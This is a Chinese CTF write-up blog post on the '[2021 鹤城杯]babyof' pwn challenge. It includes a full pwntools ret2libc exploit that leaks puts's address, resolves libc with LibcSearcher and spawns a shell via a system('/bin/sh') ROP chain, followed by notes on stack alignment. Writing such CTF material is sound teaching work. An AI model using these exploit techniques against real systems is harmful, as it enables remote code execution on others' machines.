【PWN · ret2libc】[2021 鹤城杯]babyof

已于 2023-06-01 23:57:02 修改
阅读量2.7k 收藏 25
点赞数 13
分类专栏: 【PWN · Stack】 文章标签: ctf pwn ret2libc
于 2023-05-30 23:45:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/130959123
版权
文章详细介绍了64位Linux系统下ret2libc漏洞利用的技术流程,包括通过puts泄漏GOT表地址,计算libc基址,构造system调用以执行/bin/sh。作者使用pwntools和LibcSearcher库来辅助分析,并讨论了攻击步骤、参数传递方式以及注意事项,特别提到了栈对齐和ret指令在payload中的作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Linux_64的经典ret2libc题目,有必要好好整理总结一下其中的流程和注意点

目录

前言

一、题目重述

二、exp(思考与理解在注释)

三、经验总结

攻击步骤:

注意要点 

四、疑问 

前言

64位Linux和32位Linux确乎有着关于参数传递上的不同,然而无论哪种,关于ret2libc这一题型。如果仅仅是wiki上的三道题目,那还是远远不够的。故尝试通过本题,总结ret2libc的一般过程。

过程包括通过puts/write来泄露got表中的puts/write的真实地址->计算libc的基址->libc基址+任意库函数相对于libc的偏移量=任意函数真实地址->libc基址+libc中'/bin/sh'偏移量='/bin/sh'地址,如此构造system('/bin/sh')

一、题目重述

很明显存在栈溢出。而动态链接、不存在system、不存在'/bin/sh',说明是ret2libc无疑了。 

二、exp(思考与理解在注释)

from pwn import *                 #pwntools
from LibcSearcher import *        #定位libc函数以及特殊字符串;题目没给libc!!至少在nssctf目前还没授权,也没正确的libc附件,但是我们有强大的LibcSearcher库

elf=ELF("./babyof")               #获取got/plt等程序信息
context(arch="amd64",log_level="debug",os="linux")

pop_ret_rdi_addr=0x400743	        #64linux,用于参数填入函数
puts_plt_addr=0x400520            #用于调用puts,打印(泄露)got表填写的函数真实地址
main_addr=0x40066b                #用于返回main函数,准备第二次栈溢出(?)
ret=0x400506                      #用于返回,否则出错(?)

io=remote("node4.anna.nssctf.cn",28715)  #远程连接

payload=b'a'*(0x40+8)             #溢出
payload+=p64(pop_ret_rdi_addr)+p64(elf.got["puts"])     #pop和栈上填写信息连用,实际效果是将填入栈的值传给寄存器,这一点值得记下来;填写了puts要打印的内容是got表puts的真实地址
payload+=p64(puts_plt_addr)       #puts的plt地址,用于(参数准备好后)调用call puts
payload+=p64(main_addr)           #因为是return puts("I hope you win"),而此时栈上已经一塌糊涂,我们手动让程序执行流回到main准备下一次溢出

io.sendlineafter("overflow?\n",payload)  #在此之后就是read,读取我们的payload。效果:打印puts的真实地址,然后返回main函数,准备在此栈溢出
io.recvuntil('win\n')
puts_real_addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))  #直到读取到\x7f结束符,然后截取后六位(地址),ljust转8字节补齐,u64转为无符号整数
#一个地址的最高位的两个字节是00,而且实际栈地址一般是0x7fxxxx开头的,因此为了避免获取错误的地址值,只需要获取前面的6字节值,然后通过ljust函数把最高位的两字节填充成00。

#=====================================================之所以称为ret2libc:=======================================================
libc=LibcSearcher('puts',puts_real_addr)         #LibcSearcher,通过函数名和函数真实地址来找到对应的libc(之后会做选择,选择正确的那个即可) 
libc_addr=puts_real_addr-libc.dump("puts")       #libc的真实的基址=puts的真实地址-puts相对于libc基址的偏移量
bin_sh_addr=libc_addr+libc.dump("str_bin_sh")    #'/bin/sh'的真实地址=libc基址的真实地址+'/bin/sh'相对于libc基址的偏移量
system_real_addr=libc_addr+libc.dump("system")   #system函数的真实地址=libc基址的真实地址+system函数相对于libc基址的偏移量
#===============================================================================================================================

payload2=b'a'*(0x40+8)            #栈溢出
payload2+=p64(ret)                #就是这里,其实不太明白。为什么不直接开始下一步(去掉ret),但是会出错。我的理解是,puts函数跳回,然后在
payload2+=p64(pop_ret_rdi_addr)+p64(bin_sh_addr)#system函数的参数准备,即把'/bin/sh'(的地址)传入 
payload2+=p64(system_real_addr)   #调用system
payload2+=p64(main_addr)          #只是为了能够找到一个合法地址(?) 

io.sendlineafter("overflow?\n",payload2)         #栈溢出点发送payload
io.recv()                         #吸收一下发过来的数据,没必要
io.interactive()                  #开始交互,ls -> cat flag

关于plt/got和ret的获取方式,可以通过ROPgadget以及pwntools中ELF或者gdb调试获得。

当然IDA的反汇编也是非常重要的。

三、经验总结

攻击步骤:

1、泄露任意一个函数的真实地址:只有被执行过的函数才能获取地址

2、获取libc的版本

3、根据偏移获取shell和sh的位置:

        a、求libc的基地址(函数动态地址-函数偏移量)

        b、求其他函数地址(基地址+函数偏移量)

4、执行程序获取shell

注意要点 

  • 64位Linux前六个参数是使用rdi, rsi, rdx, rcs, r8, r9 传递的;32位Linux是用栈传递参数的
  • libc已知的情况,可以通过反编译libc获取地址,也可以用pwntools的ELF类来获取
  • libc未知的情况下,需要确定libc的版本号,在线查找libc database search (blukat.me) 
  • 可以使用LibSearcher库极大方便地确定libc、确定libc基址、确定函数真实地址
  • 64位下,参数可通过pop_reg+value的方式,把value传入reg以备作参数
  • obj = LibcSearcher("gets",gets_real_addr)
libcbase = gets_real_addr – obj.dump("gets")
system_addr = libcbase + obj.dump("system")            #system 偏移
bin_sh_addr = libcbase + obj.dump("str_bin_sh")         #/bin/sh 偏移

四、疑问 

  • exp下的程序执行流究竟是怎么样的?
  • payload1/2都在最后加了main_addr,第一个是为了重新栈溢出(吧?),第二个呢是为了程序能够正常退出吗?
  • 大佬们的wp,都自然而然加了ret——不加会出错,ret的作用是什么,从哪里返回到哪里?这应该还是与程序控制执行流的实际情况有关吧。求解答!!!!

===============================2023/6/1更新================================ 

在奕浩大佬的帮助下,动态调试,直接理解了其中的原因:

其实这是因为system被调用时,其中有一个汇编指令,要求栈顶16字节对齐,否则会出错。而我们为了能够正常执行跳转,又需要栈能够调整其高度,就可以通过ret+ret+...+addr的方式。这样首先是调整了输入的个数(满足栈顶对齐的要求),其次ret到下一个ret,反复执行实则是“空转”,相当于pop了当前的栈元素,不起到任何其他作用。最后还是跳到了addr的位置。 

NSSCTF刷题笔记pwn10——[2021 鹤城]babyof
qq_45692883的博客
02-02 469
朴实无华的栈溢出,没有system函数,也没有/bin/sh字符串,也没有给libc文件。这是通过libcsearcher获取偏移的代码,可惜在这题好像行不通,但是思路是这样子的。通过泄露目标的函数地址,我可以确定目标使用的是这两个libc文件。然后是修改过后的代码,基本上没差。但是我们有puts可以泄露数据。
pwn ret2libc
清霂的博客
02-04 583
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libc。 libc.so是一个函数库(类似于C语言#include<iostream>的iostrea
[2021 鹤城]babyof(libc泄露)
m0_74355719的博客
11-29 596
【代码】[2021 鹤城]babyof(libc泄露)
[2021 鹤城]babyof全网最详细
qq_41937545的博客
10-13 584
[2021 鹤城]babyof全网最详细
PWN篇:ret2libc
weixin_44644249的博客
01-28 529
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
[CTF]PWN--新人入门第一关--Ret2libc
2301_79880752的博客
02-29 1580
首先我们需要找到pop rdi|ret这个指令在程序中的位置(前面提到该指令为程序中自带的,只不过需要我们去寻找),然后让程序返回到pop rdi|ret这个指令上去执行它,通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址,其中ROPgadget为一个插件,需要自己下载,binary意思为一个二进制文件,后面跟着的是文件名,only后面跟着的为要搜索的命令地址。
PWN基础17:Ret2Libc 64位实例
prettyX的博客
07-24 4667
复现一下Ret2Libc 32位下的内存布局 针对这张图,我们在上一节做了细致的分析 32位的调用方式 32位系统中调用函数的方式:栈传递参数 构造函数调用将参数和返回地址放在栈上 构造执行write(1,buf2,20)后,再返回main函数 64位的调用方式 64位系统中使用寄存器传递参数:rdi、rsi、rdx、rcx、r8、r9(1-6个参数) 这节课,我们研究的源码 #include <stdio.h> char buf2[10]="ret2libc is goo
PWN题型之Ret2Libc
swedsn
03-18 5786
文章目录前言0x1 :使用前提条件0x2 :为什么要这么使用0x3 :使用方法0x4 :实例二、使用步骤总结 前言 菜鸡总结,如有不对,请指点 0x1 :使用前提条件 查看保护:开启了NX保护,但是没有开启PLE保护,可以开启canary保护。但是这样就是两种题型结合了。 打开IDA查看源代码:存在溢出条件,但是没有system函数(/bin/sh)和 flag字样。 ` 0x2 :为什么要这么使用 由于缺少system函数,所以需要构造shellcode。但是开启了NX保护(可执行的不可修改,可修改不可执
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1216
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
pwn ret2libc系列
zip471642048的博客
05-30 299
文章目录ret2libc1 题目链接 :https://github.com/ctf-wiki/ctf-challenges ret2libc1 checksec一下只开了NX 和 部分RELRO main函数 secure函数 有溢出给了plt表里也有system函数的address 也有/bin/sh字符串,payload已经可以构造出来了 offset = 0x64 ...
ret2libc1pwn 入门题
02-11
pwn 入门题
ret2libc2pwn 入门题
02-11
pwn 入门题
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2976
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
pwn学习——ret2libc2
MrTreebook的博客
11-28 1227
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
热门推荐
Bossfrank的博客
12-08 1万+
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体题目具体的介绍了解pwn题的完整过程。
pwn学习笔记(4)ret2libc
qq_66013948的博客
02-19 1518
​ 静态链接是由链接器在链接时将库的内容加入到可执行程序中的做法。链接器是一个独立程序,将一个或多个库或目标文件(先前由编译器或汇编器生成)链接到一块生成可执行程序。这里的库指的是静态链接库,Windows下以.lib为后缀,Linux下以.a为后缀。​ 也就是说将静态链接库中的所有的函数都写入这个ELF文件中,所以会造成该二进制文件极为庞大,因此也会存在很多的可供利用来ret2syscall的gadgets。但是,使用静态链接生成的可执行文件体积较大,包含相同的公共代码,造成浪费。
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8646
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
字符串溢出(pwn溢出)--ret2libc
莫慌的博客
09-29 558
pwn入门
Pwn学习-ret2libc三联
cdl10000的博客
11-05 367
正常请求ebp要ret至main函数,因此把此间的变量覆盖成其他的函数地址。此处调试过程需要注意,输入的位置是gets函数,要继续调试至main函数再查看stack,计算此时的偏移量,偏移量为112。此题目与上一题最大的区别就是没有/bin/sh,那么结合攻击思路,需要写一个/bin/sh进去执行。调试过程中有坑,需要一个地址能够写进程序,使用IDA调试,发现buf2函数可以写入。继续跟进调试,直至ret至下个main函数,再查看stack。思路一样,减少找函数的过程,提升解题效率。
ctf wiki pwn ret2libc
最新发布
03-01
### CTF PWN Ret2libc 攻击教程与实例 Ret2libc是一种利用栈溢出漏洞的技术,在这种技术下,攻击者通过覆盖返回地址来调用系统中的现有函数(通常是`system()`),从而执行任意命令。当面对静态链接的二进制文件时,由于其缺少GOT/PLT表,“xxx is statically linked, skipping GOT/PLT symbols”的提示表明无法从这些地方获取库函数地址[^1]。 对于动态链接的目标而言,可以通过操纵堆栈指针指向目标函数的实际位置实现ret2libc攻击;而对于静态编译的情况,则可以直接在`.text`段内寻找所需的函数入口点并加以利用。 下面是一个简单的Python脚本用于演示如何实施ret2libc攻击: ```python from pwn import * # 设置远程连接参数 host = 'example.com' port = 9999 # 连接到服务端 conn = remote(host, port) # 假设已知偏移量为offset=108字节,并且存在可以控制的数据位于该处之后 offset = 108 # 获取/bin/sh字符串的位置以及system()函数的真实地址 bin_sh_addr = 0xdeadbeef # 需要替换为实际地址 system_addr = 0xbadc0de # 同上 payload = b'A' * offset + pack(system_addr) + b'JUNK' + pack(bin_sh_addr) # 发送载荷给服务器 conn.sendline(payload) # 切换到交互模式以便观察后续操作结果 conn.interactive() ``` 此代码片段展示了发送精心构造的有效负载至易受攻击的服务的过程,其中包含了必要的填充字符、system()函数地址及其参数"/bin/sh"所在内存区域的指针值。需要注意的是上述示例中使用的具体数值应当依据实际情况调整。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值